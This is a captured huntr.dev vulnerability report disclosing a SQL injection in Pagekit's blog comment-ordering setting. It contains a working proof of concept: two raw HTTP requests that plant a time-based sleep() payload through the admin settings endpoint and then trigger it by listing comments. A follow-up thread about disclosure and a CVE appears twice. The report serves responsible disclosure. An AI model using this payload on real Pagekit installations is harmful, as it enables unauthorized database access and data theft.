huntr.dev
Open in
urlscan Pro
2600:9000:21c7:ee00:14:bb32:5f00:93a1
Public Scan
URL:
https://huntr.dev/bounties/82f09b08-ceeb-4249-8855-b8bc718c4868/
Submission: On April 06 via api from US — Scanned from DE
Submission: On April 06 via api from US — Scanned from DE
Form analysis 0 forms found in the DOM
Text Content
huntr
Open menu
Bounties NEW Community More
Responsible disclosure policy
FAQ
Contact us
Hacktivity
Leaderboard
Submit report Login
Logout
huntr
Close menu
--------------------------------------------------------------------------------
Bounties
Find your next target
Disclose
Submit a vulnerability
Hacktivity
Browse public reports
Leaderboard
Our leaderboard
--------------------------------------------------------------------------------
Policy FAQ Contact us
Sign in with GitHub
SQL INJECTION IN PAGEKIT/PAGEKIT
0
Unverified
Reported on
Oct 15th 2021
--------------------------------------------------------------------------------
DESCRIPTION
The configAction in SettingsController allow user to set the order of comments
listing. The allowed options are ASC and DESC. That config then get concatenated
directly to the SQL query. Due to the fact that there wasnt any sanitizion
before saving that config, it can lead to the SQL Injection vulnerability.
PROOF OF CONCEPT
Step 1: Login to admin user and set the config using following request. Payload
is , if(conv('a',16,2)=conv('a',16,2),sleep(1),1)
POST /admin/system/settings/config HTTP/1.1
Host: rs.pk1018
Content-Length: 460
Accept: application/json, text/plain, */*
X-XSRF-TOKEN: c13768fcc348b767955f2f10a8f7fd7967c3520a
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4403.0 Safari/537.36
Content-Type: application/json
Origin: http://rs.pk1018
Referer: http://rs.pk1018/admin/blog/settings
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: pagekit_session=1ilh2sn95410q46iq73b6cg4f9; pagekit_auth=mOZn0198V2S2G.mEudZM%2FrfI3crXq6qYOimjJdvdmlQxmh0T9T20xs4FnzZgDl3%2F
Connection: close
{"name":"blog","config":{"comments":{"autoclose":false,"autoclose_days":14,"blacklist":"","comments_per_page":20,"gravatar":true,"max_depth":5,"maxlinks":2,"minidle":120,"nested":true,"notifications":"always","order":", if(conv('a',16,2)=conv('a',16,2),sleep(1),1)","replymail":true,"require_email":true},"posts":{"posts_per_page":20,"comments_enabled":true,"markdown_enabled":true},"permalink":{"type":"","custom":"{slug}"},"feed":{"type":"rss2","limit":20}}}
Step 2: Trigger the vulnerability by listing comments:
GET /api/blog/comment?post=1 HTTP/1.1
Host: rs.pk1018
Accept: application/json, text/plain, */*
X-XSRF-TOKEN: c13768fcc348b767955f2f10a8f7fd7967c3520a
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4403.0 Safari/537.36
Referer: http://rs.pk1018/blog/1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: pagekit_session=1ilh2sn95410q46iq73b6cg4f9; pagekit_auth=mOZn0198V2S2G.mEudZM%2FrfI3crXq6qYOimjJdvdmlQxmh0T9T20xs4FnzZgDl3%2F
Connection: close
Result: There is delay in server response due to the sleep query that confirm
the vulnerability.
IMPACT
Injection can result in data loss, corruption, or disclosure to unauthorized
parties, loss of accountability, or denial of access. Injection can sometimes
lead to complete host takeover.
OCCURRENCES
SettingsController.php L53
The input should be sanitized before save to config.
We have contacted a member of the pagekit team and are waiting to hear back 6
months ago
duongdpt modified the report
6 months ago
We have sent a second follow up to the pagekit team. We will try again in 10
days. 5 months ago
duongdpt
commented 5 months ago
Researcher
--------------------------------------------------------------------------------
@admin Hello. I see that the repository pagekit/pagekit is inactive now. Can we
disclosure this report so I can request CVE for this vulnerability through
Mitre?
Adam Nygate
commented 5 months ago
Admin
--------------------------------------------------------------------------------
Hi Duong, we will wait till the 15th of November to be sure that the project is
inactive before fully disclosing this report.
We have sent a third and final follow up to the pagekit team. This report is
stale. 5 months ago
duongdpt
commented 5 months ago
Researcher
--------------------------------------------------------------------------------
Can we disclosure this now?
Jamie Slome
commented 5 months ago
Admin
--------------------------------------------------------------------------------
@q5ca - the report is now publicly visible ♥️
duongdpt
commented 5 months ago
Researcher
--------------------------------------------------------------------------------
Nice, thank you. And could you give me some help with the process of requesting
CVE?
Jamie Slome
commented 5 months ago
Admin
--------------------------------------------------------------------------------
@duongdpt - we do not currently issue CVEs against reports which have not
received a response from the maintainer.
Sign in to join this conversation
Vulnerability Type:
CWE-89
Severity:
High (7.4)
Affected Version:
*
Visibility:
Public
Status:
Awaiting review
Reported by
duongdpt
@q5ca
amateur
This report was seen 0 times.
We have contacted a member of the pagekit team and are waiting to hear back 6
months ago
duongdpt modified the report
6 months ago
We have sent a second follow up to the pagekit team. We will try again in 10
days. 5 months ago
duongdpt
commented 5 months ago
Researcher
--------------------------------------------------------------------------------
@admin Hello. I see that the repository pagekit/pagekit is inactive now. Can we
disclosure this report so I can request CVE for this vulnerability through
Mitre?
Adam Nygate
commented 5 months ago
Admin
--------------------------------------------------------------------------------
Hi Duong, we will wait till the 15th of November to be sure that the project is
inactive before fully disclosing this report.
We have sent a third and final follow up to the pagekit team. This report is
stale. 5 months ago
duongdpt
commented 5 months ago
Researcher
--------------------------------------------------------------------------------
Can we disclosure this now?
Jamie Slome
commented 5 months ago
Admin
--------------------------------------------------------------------------------
@q5ca - the report is now publicly visible ♥️
duongdpt
commented 5 months ago
Researcher
--------------------------------------------------------------------------------
Nice, thank you. And could you give me some help with the process of requesting
CVE?
Jamie Slome
commented 5 months ago
Admin
--------------------------------------------------------------------------------
@duongdpt - we do not currently issue CVEs against reports which have not
received a response from the maintainer.
Sign in to join this conversation
2021 © 418sec
HUNTR
* home
* hacktivity
* leaderboard
* FAQ
* contact us
* terms
* privacy policy
PART OF 418SEC
* company
* about
* team
Chat with us